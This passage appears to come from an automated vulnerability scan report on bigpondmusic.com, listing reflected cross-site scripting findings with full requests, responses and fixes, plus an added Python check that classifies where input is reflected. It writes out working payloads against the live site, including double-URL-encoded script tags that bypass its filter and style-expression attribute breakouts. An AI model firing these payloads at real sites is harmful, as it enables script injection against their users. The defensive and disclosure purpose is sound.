p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 135207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian re-inks deal w
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music3aec1"><script>alert(1)</script>df6787036f4" />
...[SNIP]...

2.382. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb687%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252798d0748ea4d was submitted in the REST URL parameter 4. This input was echoed as eb687'style='x:expression(alert(1))'98d0748ea4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers; Internet Explorer 8 and later disable CSS expressions in standards mode, which the HTML 4.01 Transitional doctype in this response selects unless a compatibility override applies, so the expression() payload needs a legacy or compatibility-mode IE. The attribute breakout itself is browser-independent; only the payload carried by it is IE-specific.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5082/guy-sebastian-re-inks-deal-with-sony-musiceb687%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252798d0748ea4d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian re-inks deal w
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-musiceb687'style='x:expression(alert(1))'98d0748ea4d' />
...[SNIP]...

2.383. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e73f8"style%3d"x%3aexpression(alert(1))"6ba8bd82e09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e73f8"style="x:expression(alert(1))"6ba8bd82e09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music?e73f8"style%3d"x%3aexpression(alert(1))"6ba8bd82e09=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134794


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian re-inks deal w
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music?e73f8"style="x:expression(alert(1))"6ba8bd82e09=1" />
...[SNIP]...
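Findings 2.378, 2.379, 2.382 and 2.383 report the same kind of marker-prefixed payload landing in four different places: a single-quoted JavaScript string, a double-quoted attribute, a single-quoted attribute, and again a double-quoted attribute. Note also that in 2.383 the payload was submitted once-encoded, with the double quote sent literally in the query string, and was reflected unchanged: whatever filter forced the double-encoding trick on the path segments did not stop this variant, which needs no angle brackets. The check below (added here; not code from the original report or from the scanner) classifies where a reflection sits, given a response body and the random marker that prefixes the payload. The sample bodies are constructed by trimming the excerpts reproduced in this report; the function names are hypothetical.

```python
"""Classify the syntactic context in which a marker is reflected."""
from typing import Optional

_QUOTE_NAME = {"'": "single-quoted", '"': "double-quoted"}


def _open_quote(text: str, backslash_escapes: bool) -> Optional[str]:
    """Return the quote character still open at the end of `text`, if any.

    backslash_escapes is True for JavaScript (where \\' does not close a
    string) and False for HTML attribute values."""
    state = None
    i = 0
    while i < len(text):
        ch = text[i]
        if state and backslash_escapes and ch == "\\":
            i += 2                      # skip the escaped character
            continue
        if state is None and ch in "'\"":
            state = ch
        elif ch == state:
            state = None
        i += 1
    return state


def reflection_context(body: str, marker: str) -> str:
    """Name the context of the first occurrence of `marker` in `body`."""
    before = body[:body.index(marker)]
    low = before.lower()
    script_open = low.rfind("<script")
    if script_open != -1 and low.rfind("</script") < script_open:
        # Inside a <script> element: tokenise the code up to the marker.
        code = before[before.index(">", script_open) + 1:]
        quote = _open_quote(code, backslash_escapes=True)
        return f"javascript string ({_QUOTE_NAME[quote]})" if quote else "javascript code"
    tag_open = before.rfind("<")
    if tag_open != -1 and ">" not in before[tag_open:]:
        # Inside a start tag: track attribute quoting up to the marker.
        quote = _open_quote(before[tag_open:], backslash_escapes=False)
        return f"html attribute ({_QUOTE_NAME[quote]})" if quote else "html tag (unquoted)"
    return "html text"


# Constructed samples, trimmed from the responses reproduced in this report.
SAMPLES = {
    "5cbfc": ('<input type="hidden" name="parentUrl" value="http://bigpondmusic.com'
              '/news/article5cbfc"><script>alert(1)</script>60376ad53ee/5082/x" />'),
    "eb687": ("<link rel='canonical' href='http://bigpondmusic.com/news/article/5082/"
              "guy-sebastian-re-inks-deal-with-sony-musiceb687'style='x:expression(alert(1))'98d0748ea4d' />"),
    "a4939": ('<script type="text/javascript">\n'
              "   s.prop1 = 'BP';\n   s.prop2='Entertainment';\n   s.prop3= 'Music';\n"
              "   s.channel = 'newsa4939';74b0a8d079c';\n</script>"),
    "e73f8": ('<input type="hidden" name="parentUrl" value="http://bigpondmusic.com'
              '/news/article/5082/x?e73f8"style="x:expression(alert(1))"6ba8bd82e09=1" />'),
}


if __name__ == "__main__":
    for marker, body in SAMPLES.items():
        print(marker, "->", reflection_context(body, marker))
```

The classifier is deliberately shallow (no comment handling, no template literals, no nested script-in-attribute cases) but it reproduces the four verdicts above and is enough to decide which output encoding a fix needs: JavaScript string escaping for the `s.channel` case, HTML attribute encoding for the `parentUrl` and canonical-link cases.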

2.384. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09a1bbe3b8c was submitted in the REST URL parameter 1. This input was echoed as 537c4"><script>alert(1)</script>09a1bbe3b8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news537c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09a1bbe3b8c/article/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news537c4"><script>alert(1)</script>09a1bbe3b8c/article/5083/manic-street-preachers-reveal-working-title-of-next-album" />
...[SNIP]...

2.385. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1adf4'%3b948ec397c13 was submitted in the REST URL parameter 1. This input was echoed as 1adf4';948ec397c13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news1adf4'%3b948ec397c13/article/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87913


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news1adf4';948ec397c13';
   s.prop4 = 'article';
   s.prop5 = '5083';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.386. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c342'%3bb6a8ae4e4d9 was submitted in the REST URL parameter 2. This input was echoed as 4c342';b6a8ae4e4d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/article4c342'%3bb6a8ae4e4d9/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'article4c342';b6a8ae4e4d9';
   s.prop5 = '5083';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.387. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef39ff5000c was submitted in the REST URL parameter 2. This input was echoed as cd8cb"><script>alert(1)</script>ef39ff5000c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/articlecd8cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef39ff5000c/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88119


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/articlecd8cb"><script>alert(1)</script>ef39ff5000c/5083/manic-street-preachers-reveal-working-title-of-next-album" />
...[SNIP]...

2.388. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7548%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c7804749d5 was submitted in the REST URL parameter 4. This input was echoed as f7548"><script>alert(1)</script>9c7804749d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5083/manic-street-preachers-reveal-working-title-of-next-albumf7548%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c7804749d5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Manic Street Preachers revea
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-albumf7548"><script>alert(1)</script>9c7804749d5" />
...[SNIP]...

2.389. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 13591%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252785cc4b0dd1d was submitted in the REST URL parameter 4. This input was echoed as 13591'style='x:expression(alert(1))'85cc4b0dd1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album13591%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252785cc4b0dd1d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Manic Street Preachers revea
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album13591'style='x:expression(alert(1))'85cc4b0dd1d' />
...[SNIP]...

2.390. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 690b2"style%3d"x%3aexpression(alert(1))"f70bb7279cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 690b2"style="x:expression(alert(1))"f70bb7279cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated by IE 7 and earlier, and by IE 8 only in compatibility mode) and does not work in other browsers.

Request

GET /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album?690b2"style%3d"x%3aexpression(alert(1))"f70bb7279cc=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107758


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Manic Street Preachers revea
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album?690b2"style="x:expression(alert(1))"f70bb7279cc=1" />
...[SNIP]...

2.391. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f408%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3052a20ef0 was submitted in the REST URL parameter 1. This input was echoed as 9f408"><script>alert(1)</script>b3052a20ef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news9f408%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3052a20ef0/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
